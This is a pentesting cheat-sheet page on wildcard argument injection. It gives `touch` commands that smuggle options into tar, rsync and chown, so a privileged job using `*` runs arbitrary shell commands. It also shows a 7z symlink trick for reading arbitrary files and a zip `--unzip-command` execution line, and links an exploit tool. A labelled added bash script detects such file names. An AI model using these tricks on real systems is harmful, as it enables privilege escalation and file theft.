Wildcards Spare tricks

chown, chmod

You can indicate which file owner and permissions you want to copy to the other files

touch "--reference=/my/own/path/filename"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (combined attack). More info in https://www.exploit-db.com/papers/33930

Tar

Execute arbitrary commands:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar attack). More info in https://www.exploit-db.com/papers/33930

Rsync

Execute arbitrary commands:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
    --rsync-path=PROGRAM    specify the rsync to run on remote machine

touch "-e sh shell.sh"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (rsync attack). More info in https://www.exploit-db.com/papers/33930

7z

In 7z, even when -- is used before * (note that -- means that the input that follows cannot be treated as parameters, so only file paths in this case), you can still abuse an error message to read an arbitrary file. So if a command like the following one is being executed by root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

And you can create files in the folder where this is being executed, you can create the file @root.txt and the file root.txt as a symlink to the file you want to read:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Then, when 7z is executed, it will treat root.txt as a file containing the list of files it should compress (that is what the existence of @root.txt indicates). When 7z reads root.txt it will read /file/you/want/to/read, and because the content of this file is not a list of files, it will throw an error showing the content.

More info in the write-ups of the box CTF from HackTheBox.
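
A defensive check for the chown, tar, rsync and 7z cases above, as an added example that is not part of the original page: the hypothetical helpers classify_name, audit_dir and safe_args flag directory entries that a bare * would hand to a command as an option or as a 7z list file, and show that writing the job with ./* passes every name as a path. The name patterns are the ones used in the commands shown above.

```shell
#!/usr/bin/env bash
# Added example (hypothetical helpers). Usage: source this file, then run
#   audit_dir /path/the/job/globs
# Patterns below are the option and list-file names discussed on this page.

# Classify one bare entry name as an unquoted `*` would hand it to a command.
classify_name() {
  case "$1" in
    --reference=*)                        echo "option:chown/chmod --reference" ;;
    --checkpoint=*|--checkpoint-action=*) echo "option:tar --checkpoint" ;;
    -e\ *|--rsh=*|--rsync-path=*)         echo "option:rsync remote shell" ;;
    -*)                                   echo "option:leading dash" ;;
    @*)                                   echo "listfile:7z @file, not stopped by --" ;;
    *)                                    return 1 ;;
  esac
}

# Print "<class><TAB><name>" for each hazardous entry directly inside $1.
# Returns 0 when something was flagged, 1 when the directory is clean.
audit_dir() {
  local dir path name class rc
  dir=$1
  rc=1
  for path in "$dir"/*; do
    # Skip the literal pattern left behind by an empty directory; keep
    # dangling symlinks, which -e alone would miss.
    [ -e "$path" ] || [ -L "$path" ] || continue
    name=${path##*/}
    if class=$(classify_name "$name"); then
      printf '%s\t%s\n' "$class" "$name"
      rc=0
    fi
  done
  return "$rc"
}

# Words a command receives when the job is written with ./* instead of *:
# each one starts with "./", so none can begin with "-" or "@".
safe_args() {
  ( cd "$1" && printf '%s\n' ./* )
}
```

Running audit_dir from the same account and directory as the scheduled job, before the job itself, gives an exit status that can gate the run.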

Zip

Execute arbitrary commands:

zip name.zip files -T --unzip-command "sh -c whoami"
